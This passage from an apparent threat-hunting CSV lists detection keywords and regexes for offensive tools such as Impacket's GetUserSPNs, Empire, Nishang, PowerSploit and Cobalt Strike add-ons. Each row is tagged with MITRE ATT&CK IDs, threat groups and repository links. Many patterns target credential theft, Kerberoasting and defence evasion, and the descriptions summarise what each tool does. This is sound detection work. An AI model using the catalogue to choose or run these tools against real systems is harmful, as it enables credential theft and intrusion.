TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*gettgtpkinit.py -cert-pfx*",".{0,1000}gettgtpkinit\.py\s\-cert\-pfx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*gettgtpkinit.py -pfx-base64 *",".{0,1000}gettgtpkinit\.py\s\-pfx\-base64\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*gettgtpkinit.py*",".{0,1000}gettgtpkinit\.py.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*Getting permissions of sensitive files.*",".{0,1000}Getting\spermissions\sof\ssensitive\sfiles\..{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*Getting the Obfuscated JS Code*",".{0,1000}Getting\sthe\sObfuscated\sJS\sCode.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*Get-TrustTicket.ps1*",".{0,1000}Get\-TrustTicket\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Get-UnattendSensitiveData*",".{0,1000}Get\-UnattendSensitiveData.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*get-unixUserPassword.py*",".{0,1000}get\-unixUserPassword\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*Get-USBKeystrokes*",".{0,1000}Get\-USBKeystrokes.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1152","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-UserBadPwdCount*",".{0,1000}Get\-UserBadPwdCount.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-userPassword.py*",".{0,1000}get\-userPassword\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*Get-UserPrivileges*",".{0,1000}Get\-UserPrivileges.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Get-UserPRTToken*",".{0,1000}Get\-UserPRTToken.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*GetUserSPNs.*",".{0,1000}GetUserSPNs\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*GetUserSPNs.ps1*",".{0,1000}GetUserSPNs\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*GetUserSPNs.ps1*",".{0,1000}GetUserSPNs\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*GetUserSPNs.py*",".{0,1000}GetUserSPNs\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*GetUserSPNs.vbs*",".{0,1000}GetUserSPNs\.vbs.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*getusrdompwinfo *;quit*",".{0,1000}getusrdompwinfo\s.{0,1000}\;quit.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*Get-VaultCredential*",".{0,1000}Get\-VaultCredential.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-VaultCredential*",".{0,1000}Get\-VaultCredential.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-VaultCredential.ps1*",".{0,1000}Get\-VaultCredential\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-VaultCreds*",".{0,1000}Get\-VaultCreds.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-VolumeShadowCopy*",".{0,1000}Get\-VolumeShadowCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-WebCredentials*",".{0,1000}Get\-WebCredentials.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Get-WebCredentials.ps1*",".{0,1000}Get\-WebCredentials\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*GetWebDAVStatus.csproj*",".{0,1000}GetWebDAVStatus\.csproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*GetWebDAVStatus.sln*",".{0,1000}GetWebDAVStatus\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*GetWebDAVStatus_DotNet*",".{0,1000}GetWebDAVStatus_DotNet.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*GetWebDAVStatus_x64.o*",".{0,1000}GetWebDAVStatus_x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*GetWhoamiCommand*",".{0,1000}GetWhoamiCommand.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*GetWhoamiCommand.cs*",".{0,1000}GetWhoamiCommand\.cs.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*GetWindowsCredentials.exe*",".{0,1000}GetWindowsCredentials\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*Get-Wlan-Keys*",".{0,1000}Get\-Wlan\-Keys.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Get-WLAN-Keys*",".{0,1000}Get\-WLAN\-Keys.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Get-WLAN-Keys.ps1*",".{0,1000}Get\-WLAN\-Keys\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Get-WLAN-Keys.ps1*",".{0,1000}Get\-WLAN\-Keys\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Get-Wlan-Keys.ps1*",".{0,1000}Get\-Wlan\-Keys\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Get-WMIEventLogins*",".{0,1000}Get\-WMIEventLogins.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*getwmiregcachedrdpconnection*",".{0,1000}getwmiregcachedrdpconnection.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 